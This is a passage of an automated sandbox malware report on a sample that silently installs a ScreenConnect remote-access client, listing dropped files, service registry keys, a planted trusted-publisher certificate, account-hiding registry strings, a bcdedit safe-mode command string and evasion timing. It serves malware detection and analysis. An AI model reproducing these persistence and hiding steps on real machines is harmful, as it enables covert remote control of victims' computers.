                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FF849237D84 push ss; iretd 10_2_00007FF849237D85
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 14_2_00007FF84925203F push ds; iretd 14_2_00007FF849252046

                  Persistence and Installation Behavior

                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: ScreenConnect.ClientService.dll.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ff0619b3-cdda-4e74-9760-149d39b5b1c0)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 00000006.00000002.2462747546.0000000004A12000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.3888780873.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529477567.00000000009B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 2356D330000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 2356ECD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Memory allocated: 1590000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Memory allocated: 1B100000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Memory allocated: B60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Memory allocated: 25D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Memory allocated: 2390000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Memory allocated: 11D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Memory allocated: 1400000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Memory allocated: 1340000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Memory allocated: 6F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Memory allocated: 1A280000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Memory allocated: 760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Memory allocated: 1A4E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 796
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 3451
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 5068
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe TID: 1200 Thread sleep count: 122 > 30
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe TID: 1200 Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6756 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5520 Thread sleep time: -172550s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5520 Thread sleep time: -253400s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6756 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 5544 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 6536 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe TID: 6588 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe TID: 4676 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe TID: 2876 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
